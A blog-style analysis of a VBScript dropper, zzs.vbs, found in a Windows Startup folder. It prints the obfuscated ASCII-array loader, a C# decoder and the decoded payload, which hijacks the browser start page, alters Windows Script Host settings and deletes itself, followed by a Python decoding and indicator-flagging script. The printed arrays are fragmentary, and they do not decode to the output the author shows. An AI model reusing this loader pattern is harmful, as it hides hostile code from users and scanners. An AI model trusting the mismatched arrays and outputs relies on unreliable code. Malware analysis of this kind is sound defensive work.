Today I restored my computer to its November 7 state. After ESET updated, it turned out that the directory C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup contained a file named zzs.vbs, which is not a well-known program. I had nothing else to do at the time, so I opened it to find out what it was. Because ESET was blocking it, I dragged the file out and changed its extension. The code is not long. The first half is a list of ASCII codes:

    strs = Array (68,111, 83,101,116, 32,111, 98,106, 101,114,118,105, 99,101, 101,116, 106,101, 99,116, 119,105,110,109,103,109,116,115, 92,114,111,111,116, 105,109,118, 101,116, 111,108, 80,114,111, 99,101,115,115,101,115, 32,111, 98,106, 101,114,118,105, 99,101, 120,101, 117,101,114, 101,108,101, 99,116, 32,102,114,111,109, 105,110, 114,111, 99,101,115,115, 70,111,117,110,100, 80,114,111, 99,101,115,115, 70,111,114, 114,111, 99,101,115,115, 99,111,108, 80,114,111, 99,101,115,115,101,115, 32, 32, 32, 32, 32, 73,102, 32,111, 98,106, 80,114,111, 99,101, 115,115, 97,109,101, 117,115,101,114,105,110,105,116, 46,101,120,101, 84,104,101,110, 70,111,117,110,100, 80,114,111, 99,101,115,115, 32, 32, 32, 32, 49, 13, 10, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 69,120,105,116, 111,114, 69,110,100, 13, 10, 32, 32, 32, 32, 32, 32, 73, 32, 32, 78, 101,120,116, 73,102, 111,117, 32, 32, 32, 110,100, 80,114,111, 99,101,115,115, 104,101,110, 120,105,116, 114,105,112,116, 108,101,101,112, 48, 48, 76,111,111,112, 97,103,101, 104,116,116,112, 47,119,119,119, 111,109, 111,110,101, 13, 101,116, 32,111, 98,106, 83,104,101,108,108, 114,101, 97,116,101, 106,101, 99,116, 99,114,105,112,116, 104,101,108,108, 104,101,108,108, 101,103, 87,114,105,116,101, 111,102,116,119, 97,114,101, 114,111,115,111,102,116, 110,116,101,114,110,101,116, 120,112,108,111,114,101,114, 97,105,110, 114,116, 97,103,101, 32,115, 103,101, 115,82, 101,103, 116,104, 77,105, 99,114,111,115,111,102,116, 105,110,100,111,119,115, 99,114,105,112,116, 111,115,116, 101,116,116,105,110,103,115, 69,114,114,111,114, 101,115,117,109,101, 101,120,116, 98,108,101,100, 32,111, 98,106, 83,104,101,108,108, 101,103, 82,101, 97,100, 40,115, 82,101,103, 116,104, 98,108,101,100, 69,114,114, 117,109, 98,101,114, 104,101,110, 104,101,108,108, 101,103, 87,114,105,116,101, 32,115, 82,101,103, 116,104, 98,108,101,100, 32,105, 69,110, 108,101,100, 87, 104,101,108,108, 101,103, 68,101,108,101,116,101, 32,115, 82,101,103, 116,104, 98,108,101,100, 69,110,100, 101,116, 32,111, 98,106, 83,104,101,108,108, 114,101, 97,116,101, 106,101, 99,116, 114,105,112,116,105,110,103, 105,108,101, 83,121,115,116,101,109, 106,101, 99,116, 83,101,116, 32,102, 32,111, 98,106, 83,104,101,108,108, 101,116, 70,105,108,101, 114,105,112,116, 99,114,105,112,116, 70,117,108,108, 109,101, 65,116,116,114,105, 98,117,116,101,115, 110,100, 104,101,110, 32,102, 116,116,114,105, 98,117,116,101,115, 32,102, 116,116,114,105, 98,117,116,101,115, 32, 10,111, 98,106, 83,104,101,108,108, 101,108,101,116,101, 70,105,108,101, 114,105,112,116, 99,114,105,112,116, 70,117,108,108, 109,101)

The second half is:

    ' Turn each ASCII code back into a character, then run the resulting text
    For I = 0 To UBound(strs)
        runner = runner & Chr(strs(I))
    Next
    Execute runner

Although I am not familiar with VBS, I know that it is often used to write startup items, add users, and so on. The second half is easy to understand: it converts the ASCII codes into a string and then executes it. In fact, to simply look at it, you can change Execute runner to MsgBox runner. However, ESET could not be turned off, so in the end I chose to write the decoder in C#. It is very simple; Visual Studio was already open, so I wrote it directly:

    // Decode the byte values as ASCII and print the text instead of executing it
    using System;

    byte[] strs = {68,101,116, 70,105,108,101, 114,105,112,116, 99,114,105,112,116, 70,117,108,108, 109,101, 65,116,116,114,105, 98,117,116,101,115, 110,100, 104,101,110, 32,102, 116,116,114,105, 98,117,116,101,115, 32,102, 116,116,114,105, 98,117,116,101,115, 104,101,108,108, 101,108,101,116,101, 70,105,108,101, 114,105,112,116, 99,114,105,112,116, 70,117,108,108, 109,101,};
    System.Text.ASCIIEncoding asciiEncoding = new System.Text.ASCIIEncoding();
    Console.WriteLine(asciiEncoding.GetString(strs));

After running it, the output is:

    Do
        Set objWMIService = GetObject("winmgmts:\\.\root\cimv2")
        Set colProcesses = objWMIService.ExecQuery("Select * from Win32_Process")
        FoundProcess = 0
        For Each objProcess In colProcesses
            If objProcess.Name = "userinit.exe" Then
                FoundProcess = 1
                Exit For
            End If
        Next
        If FoundProcess = 0 Then Exit Do
        WScript.Sleep 100
    Loop

    sPage = "http://www.999.com/?one"

    Set objShell = CreateObject("WScript.Shell")
    objShell.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page", sPage

    sRegPath = "HKLM\SOFTWARE\Microsoft\Windows Script Host\Settings"
    On Error Resume Next
    iEnabled = objShell.RegRead _
        (sRegPath & "\Enabled_")
    If Err.Number = 0 Then
        objShell.RegWrite sRegPath & "\Enabled", iEnabled, "REG_DWORD"
        objShell.RegDelete sRegPath & "\Enabled_"
    End If

    Set objShell = CreateObject("Scripting.FileSystemObject")
    Set f = objShell.GetFile(WScript.ScriptFullName)
    If f.Attributes And 1 Then f.Attributes = f.Attributes - 1
    objShell.DeleteFile WScript.ScriptFullName

Combined with the second half of the file, a quick read shows what it does: it first looks for the logon process userinit.exe, then modifies the registry and sets the 999 website as the browser home page. I found that it is a navigation site. Hao123 makes money as a navigation site; do they really have to copy it like this?
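The same decoding can be done without executing anything and without retyping the array by hand. The following Python is an added example, not code from the original post: it reads a script as text, decodes every numeric `Array(...)` literal, and flags the behaviours seen in the decoded output above. The function names and the short sample script are constructed for illustration.

```python
import re

# Matches  name = Array(n, n, ...)  with the loose spacing seen in the post.
ARRAY_RE = re.compile(
    r"(\w+)\s*=\s*Array\s*\(\s*(\d+(?:\s*,\s*\d+)*)\s*\)", re.IGNORECASE)

# Patterns for the behaviours the decoded zzs.vbs showed.
INDICATORS = {
    "process enumeration": r"Win32_Process",
    "registry write": r"\.RegWrite\b",
    "registry delete": r"\.RegDelete\b",
    "IE start page": r"Internet Explorer\\Main\\Start Page",
    "WSH settings": r"Windows Script Host\\Settings",
    "self delete": r"DeleteFile\s+WScript\.ScriptFullName",
}

def decode_chr_arrays(vbs_text):
    """Return {array_name: decoded_text}; the script is read, never executed."""
    decoded = {}
    for name, body in ARRAY_RE.findall(vbs_text):
        codes = [int(tok) for tok in body.split(",")]
        if all(c < 256 for c in codes):  # single-byte character table only
            decoded[name] = "".join(map(chr, codes))
    return decoded

def flag_indicators(text):
    """Sorted labels of the INDICATORS patterns found in the decoded text."""
    return sorted(k for k, rx in INDICATORS.items() if re.search(rx, text, re.I))

def build_sample():
    """Constructed sample: a two-line payload wrapped like the dropper."""
    payload = (
        'objShell.RegWrite "HKCU\\Software\\Microsoft\\Internet Explorer'
        '\\Main\\Start Page", sPage\r\n'
        "fso.DeleteFile WScript.ScriptFullName\r\n"
    )
    codes = ", ".join(str(ord(ch)) for ch in payload)
    script = (
        f"strs = Array ({codes})\n"
        "For I = 0 To UBound(strs)\n"
        "    runner = runner & Chr(strs(I))\n"
        "Next\n"
        "Execute runner\n"
    )
    return payload, script

if __name__ == "__main__":
    _, sample = build_sample()
    for name, text in decode_chr_arrays(sample).items():
        print(name, flag_indicators(text), text, sep="\n")
```

On a real sample, pass the contents of the quarantined file to `decode_chr_arrays`; an array containing values above 255 is skipped rather than decoded.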